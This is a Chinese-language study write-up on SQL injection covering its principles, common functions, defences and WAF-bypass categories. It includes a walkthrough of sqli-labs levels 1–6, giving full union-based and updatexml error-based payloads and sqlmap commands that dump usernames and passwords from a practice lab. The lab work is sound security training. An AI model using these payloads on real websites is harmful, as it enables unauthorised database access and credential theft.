目录
Task1:SQL注入原理、SQL注入常用函数及含义,SQL注入防御手段,SQL注入常用绕过waf的方法
Task1:SQL注入原理、SQL注入常用函数及含义,SQL注入防御手段,SQL注入常用绕过waf的方法
1.SQL注入原理
SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
2.SQL注入常用函数及含义
# 一些SQL注入常用的函数
UNION SELECT # 允许攻击者将恶意查询的结果与原始查询的结果结合,从而获得额外数据。
AND # 用于构造布尔型条件,以绕过认证或获取更多数据。
OR # 类似于AND,用来创建逻辑条件来绕过验证或提取数据。
SUBSTRING # 用于提取字符串中的特定部分,帮助攻击者逐步获取数据。
CHAR # 用于构造字符串,通过其ASCII码值注入恶意代码。
ASCII # 用于转换字符为其ASCII码,帮助分析数据库结构或绕过安全措施。
CONCAT # 用于连接多个字符串,帮助构造注入的SQL语句。
version() # 查看数据库版本
database() # 查看当前数据库名
user() # 查看当前数据库用户
system_user() # 查看系统用户名
group_concat() # 把数据库中的某列数据或某几列数据合并为一个字符串
@@datadir # 查看数据库路径
@@version_compile_os # 查看操作系统
3.SQL注入防御手段
1.使用预编译语句(Prepared Statements)和参数化查询:这是预防SQL注入的最有效方法之一,通过这种方式,可以确保SQL语句的结构在编译时就确定下来,之后传入的参数不会改变语句的结构,因此可以避免注入攻击。
2.使用存储过程:存储过程也可以像预编译语句一样防止SQL注入,因为它们同样使用参数化查询。
3.使用ORM(对象关系映射)工具:许多现代编程框架提供了ORM工具,它们可以自动进行参数化查询,从而降低直接编写SQL语句的风险。
4.验证用户输入:对所有用户输入进行验证,拒绝不符合预期格式的输入,可以减少注入攻击的风险。
5.使用适当的错误处理机制:不要在错误信息中透露敏感信息,以免给攻击者提供攻击线索。
6.限制数据库权限:为应用程序使用的数据库账户只赋予必要的权限,避免使用具有高级权限的账户,这样即使发生注入攻击,攻击者能做的也非常有限。
7.定期更新和打补丁:保持数据库管理系统(DBMS)更新到最新,修补已知的安全漏洞。
8.使用Web应用防火墙(WAF):WAF可以帮助识别和阻挡SQL注入攻击。
9.定期进行安全审计和代码审查:检查潜在的安全漏洞,及时修复。
10.使用参数化查询:无论何时,只要可能都应该使用参数化查询,而不是拼接SQL字符串。
4.SQL注入常用绕过waf的方法
1.变换大小写
2.编码
3.利用注释符
4.重写
5.比较操作符替换
6.同功能函数替换
7.盲注的活用
8.二阶注入
9.宽字节注入
Task2:sqli-labs通关前5关
level1
网页提示输入ID进行登录,尝试输入进入登录
尝试输入不同的数字,发现得到不同的结果
接下来判断sql语句是否是拼接,且是字符型还是数字型
根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显,所以我们可以使用联合查询。
首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。
?id=1'order by 3 --+
当测试到4时报错,所以列数为3
爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的
?id=-1'union select 1,2,3--+
获取当前数据名和版本号
?id=-1'union select 1,database(),version()--+
查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
通过上述操作可以得到两个敏感字段就是username和password,接下来要得到该字段对应的内容。
?id=-1' union select 1,2,group_concat(username , password) from users--+
level2
观察第二关,同样提示输入ID进行登录
那么同样按照第一关的流程进行测试
当我们输入单引号或者双引号可以看到报错,且报错信息看不到数字,所有可以猜测sql语句应该是数字型注入
联合注入 爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test
?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
暴字段:
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
暴数据:
?id=-1 union select 1,2,group_concat(username , password) from users
level3
在url输入 ?id=1 和 ?id=1'在输入 ?id=1' 时,出现报错
可推断出sql语句是 单引号字符型,且有括号。所以闭合需要考虑单引号和括号代码相比于上一题只需加上 ‘ ' ’ 和 ‘ )’ (单引号和括号)我们依旧是用 联合注入
显示表格列数
?id=1") order by 3--+
暴出显示位(可以看到哪一列是在页面显示)可见2、3列的数据显示在页面
?id=-1') union select 1,2,3--+
显示数据名和版本号
?id=-1') union select 1,database(),version()--+
显示表
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
显示字段
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
显示数据
?id=-1') union select 1,2,group_concat(username ,password) from users--+
level4
输入 ?id=1" 时报错
可推断出sql语句是 双引号字符型,且有括号。所以闭合需要考虑单引号和括号
代码相比于上一题只需将单引号改为双引号
显示表格列数
?id=1") order by 3--+
暴出显示位
?id=-1") union select 1,2,3--+
显示数据名和版本号
?id=-1") union select 1,database(),version()--+
显示表
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
显示字段
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
显示数据
?id=-1") union select 1,2,group_concat(username , password) from users--+
level5
输入?id=1 ?id=1' ?id=1"
根据报错结果得知是字符型
返回的也与之前不同,没有回显位,也就不使用联合注入了。选择报错注入
爆出数据库名和版本号
?id=1' and updatexml(1,concat(0x7e,database(),0x7e,version()),1) --+
爆出数据库下所有表名
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,32)),1)--+
爆出字段
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,32)),1) --+
爆出字段下数据内容
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,id,password) from users),1,30)),1) --+
Task3:总结SQLi的手工注入的步骤
- 判断是否存在注入点
- 判断字段数量
- 判断字段前端回显位置
- 判断数据库信息
- 查找数据库名
- 查找数据库表名
- 查找列名
- 查数据
Task4:使用sqlmap通过或验证第六关
使用?id=1,使sqlmap识别注入点
使用powershell打开sqlmap,使用命令爆数据库:
python .\sqlmap.py -url "http://sqli-labs-master:66/Less-6/?id=1" --batch -dbs
爆security数据库的表:
python .\sqlmap.py -url "http://sqli-labs-master:66/Less-6/?id=1" --dbms=MySQL -D 'security' --tables
爆users表的列
python .\sqlmap.py -url "http://sqli-labs-master:66/Less-6/?id=1" --dbms=MySQL -D 'security' -T 'users' --dump